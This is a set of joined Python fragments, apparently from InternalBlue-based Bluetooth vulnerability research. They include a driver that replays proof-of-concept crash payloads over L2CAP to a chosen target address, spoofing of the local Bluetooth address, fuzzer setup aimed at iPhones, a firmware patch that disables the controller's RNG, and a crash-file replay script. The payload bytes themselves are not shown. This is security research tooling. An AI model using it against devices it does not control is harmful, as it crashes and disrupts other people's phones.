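def main():
    """Interactive driver that replays one of the PoCs listed in ``VULNS``.

    Flow: pick the local InternalBlue device, pick the PoC, connect to the
    local controller, optionally set its BD address, open a link to the
    target over Classic or BLE, optionally raise the L2CAP MTU, then send the
    PoC payload(s) on the PoC's CID.

    Relies on module-level names defined outside this function: ``iOSCore``,
    ``options``, ``VULNS``, ``log``, ``bd_addr_to_bytes``,
    ``BluetoothConnection``, ``InternalBlueL2CAP`` and ``listener``.

    Exits the process with status -1 when no local device is attached or the
    connection to it fails. Required keys of a ``VULNS`` entry (KeyError
    otherwise): "description", "tech", "mtu", "payload", "cid"; optional:
    "addr_change", "listen_cid".
    """
    internalblue = iOSCore()

    # Enumerate once and index into that snapshot. Re-calling device_list()
    # after the prompt could return a different ordering and select another
    # interface than the one the user picked. Entry layout used here:
    # [1] -> interface, [2] -> human-readable label.
    devices = internalblue.device_list()
    if not devices:
        log.critical("No internalblue device found.")
        sys.exit(-1)
    if len(devices) > 1:
        i = options("Please specify device: ", [d[2] for d in devices], 0)
    else:
        i = 0
    internalblue.interface = devices[i][1]

    # let the user choose the PoC
    i = options("Please choose your vuln: ", [v["description"] for v in VULNS], 0)
    vuln = VULNS[i]

    if not internalblue.connect():
        log.critical("No connection to internalblue device.")
        sys.exit(-1)

    # Some PoCs need a specific local address. It is set through the
    # vendor-specific HCI opcode 0xfc01 (OGF 0x3f), with the address bytes
    # sent in reversed order.
    # NOTE(review): bd_addr_to_bytes() is defined elsewhere; whether it
    # validates length/hex digits of the typed address is not visible here.
    if "addr_change" in vuln and vuln["addr_change"]:
        change_addr = input("This PoC requires the Bluetooth address to be changed, " +
                "please provide it: ")
        change_addr = bd_addr_to_bytes(change_addr)
        internalblue.sendHciCommand(0xfc01, change_addr[::-1])

    # the target's address is collected interactively as well
    target = bd_addr_to_bytes(input("Target Bluetooth address: "))

    # Link to the target; reconnect=0 presumably disables automatic
    # reconnects (defined by BluetoothConnection, outside this excerpt).
    connection = BluetoothConnection(internalblue, target, reconnect=0)
    l2cap = InternalBlueL2CAP.L2CAPManager(connection)

    # PoCs that expect an answer register `listener` on their CID before the
    # link comes up, so an early response is not missed.
    if "listen_cid" in vuln:
        l2cap.registerCIDHandler(listener, vuln["listen_cid"])

    # set the Bluetooth technology [0->Classic, 1->BLE]
    connection.connection_type = vuln["tech"]
    connection.connect()

    # If the PoC includes larger messages we need to do the MagicPairing Ping trick to
    # increase the L2CAP MTU. This could also be done by sending L2CAP Information Requests and
    # Responses but this would take longer.
    if vuln["mtu"]:
        log.info("Sending MagicPairing Ping to increase L2CAP MTU")
        l2cap.sendData(bytes.fromhex("F00000"), 0x30)

    # Log the description up to and including its first "]". When there is
    # no "]" the old slice produced an empty string; log the whole text instead.
    desc = vuln["description"]
    tag_end = desc.find("]")
    log.info("Executing payload for %s", desc[:tag_end + 1] if tag_end >= 0 else desc)
    if isinstance(vuln["payload"], list):
        for p in vuln["payload"]:
            l2cap.sendData(bytes.fromhex(p), vuln["cid"])
    else:
        log.info("Sending: { %s }", vuln["payload"])
        l2cap.sendData(bytes.fromhex(vuln["payload"]), vuln["cid"])

    # Presumably lets the last frames leave the controller before the script
    # returns — TODO confirm the intent of this delay.
    time.sleep(1)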
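    def __init__(self, target):
        """Open the local InternalBlue device and a Bluetooth link to *target*.

        ``target`` is handed straight to ``BluetoothConnection``; its expected
        form is defined by that class, outside this file. Exits the process with
        status -1 when no local device is attached or the connection to it
        fails. ``iOSCore``, ``options``, ``log``, ``BluetoothConnection`` and
        ``sys`` come from module scope.
        """
        # set up internalblue, adapt if you need a different core or device
        self.internalblue = iOSCore(log_level=10)
        # Index into the one enumeration shown to the user. Re-enumerating
        # after the prompt could reorder the list and pick a different
        # interface than the one selected. Entry layout: [1] -> interface,
        # [2] -> label.
        devices = self.internalblue.device_list()
        if not devices:
            log.critical("No internalblue device found")
            sys.exit(-1)
        i = options("Please specify device: ", [d[2] for d in devices], 0)
        self.internalblue.interface = devices[i][1]
        if not self.internalblue.connect():
            log.critical("No connection to internalblue device")
            sys.exit(-1)

        # for MP it might make sense to change this to a known device address
        # as unknown addresses cause the receiving iPhone to crash constantly
        # as long as Apple does not fix these NULL pointer derefs
        # self.internalblue.sendHciCommand(0xfc01, bytes.fromhex("cafebabe1337"))

        # set up BT connection to the target; reconnect=0 presumably disables
        # automatic reconnects (defined by BluetoothConnection)
        self.connection = BluetoothConnection(self.internalblue,
                                              target,
                                              reconnect=0)
        self.connection.connect()

        # init_fuzzer() is *called* here and its return value is installed as
        # the connection callback; the link is already up at this point.
        # init_fuzzer is defined outside this excerpt.
        self.fuzzer = None
        self.connection.connection_callback = self.init_fuzzer()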
    // send hci event
    mov  r0, r4  // back to buffer at offset 0
    bl  0x573B8     // send_hci_event_without_free()
    
    // free HCI buffer
    mov r0, r4
    bl  0x581AE     // osapi_blockPoolFree

    pop   {r0-r4, pc}
    
    
""" % (MEM_ROUNDS, MEM_RNG)


# Script body: open the first InternalBlue device and start installing the
# firmware patches (the assembly string above is one of them).
internalblue = iOSCore(log_level='info')
# NOTE(review): device_list()[0] raises IndexError when no device is attached.
internalblue.interface = internalblue.device_list()[0][1]  # just use the first device

# setup sockets
if not internalblue.connect():
    log.critical("No connection to target device.")
    # site builtin exit(), not sys.exit(); works for a script but not when
    # this module is imported or run with -S
    exit(-1)

# NOTE(review): log.info() presumably returns None, so progress_log is
# likely unused — confirm it was not meant to be a log.progress() handle.
progress_log = log.info("installing assembly patches...")



# Disable original RNG
# Overwrites the first 4 bytes at FUN_RNG with two `bx lr`, so the function
# returns immediately. FUN_RNG (like MEM_ROUNDS / MEM_RNG above) is defined
# earlier in the file, outside this excerpt.
patch = asm("bx lr; bx lr", vma=FUN_RNG)  # 2 times bx lr is 4 bytes and we can only patch 4 bytes
if not internalblue.patchRom(FUN_RNG, patch):
    log.critical("Could not disable original RNG!")
    # NOTE(review): unlike the connect failure above, execution continues
    # after this failure; any later patch that assumes the RNG is disabled
    # would then run against the unmodified one — confirm whether an exit
    # is intended here.
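_BLE = 1  # technology selector; _CLASSIC is defined above this excerpt

# Command line: crash_file bd_addr [BLE]
if len(sys.argv) < 3:
    log.error("USAGE: {} crash_file bd_addr [BLE]".format(sys.argv[0]))
    sys.exit(-1)

crashfile = sys.argv[1]
bd_addr = sys.argv[2].replace(":", "")

# Validate the address up front: bytes.fromhex() raises ValueError on
# non-hex input, and previously a wrong-length value reached
# BluetoothConnection unchecked. A BD address is 6 bytes = 12 hex digits.
try:
    target_addr = bytes.fromhex(bd_addr)
except ValueError:
    target_addr = b""
if len(target_addr) != 6:
    log.error("bd_addr must be 6 hex bytes like 11:22:33:44:55:66, got: {}".format(sys.argv[2]))
    sys.exit(-1)

# only do BLE if specified
# NOTE: any third argument selects BLE, but only when argv has exactly four
# entries; with more arguments the script silently stays on Classic.
tech = _CLASSIC
if len(sys.argv) == 4:
    log.info("Using BLE")
    tech = _BLE

internalblue = iOSCore(log_level=10)

# let the user choose the device (prompted even when only one is attached).
# Index into the one enumeration shown to the user instead of calling
# device_list() again, which could return a different ordering.
# Entry layout: [1] -> interface, [2] -> label.
devices = internalblue.device_list()
if not devices:
    log.critical("No internalblue device found.")
    sys.exit(-1)
i = options("Please specify device: ", [d[2] for d in devices], 0)
internalblue.interface = devices[i][1]

# setup sockets
if not internalblue.connect():
    log.critical("No connection to internalblue device.")
    sys.exit(-1)

# reconnect=0 presumably disables automatic reconnects (defined by
# BluetoothConnection, outside this excerpt)
connection = BluetoothConnection(internalblue,
                                 target_addr,
                                 reconnect=0)
l2cap_mgr = InternalBlueL2CAP.L2CAPManager(connection)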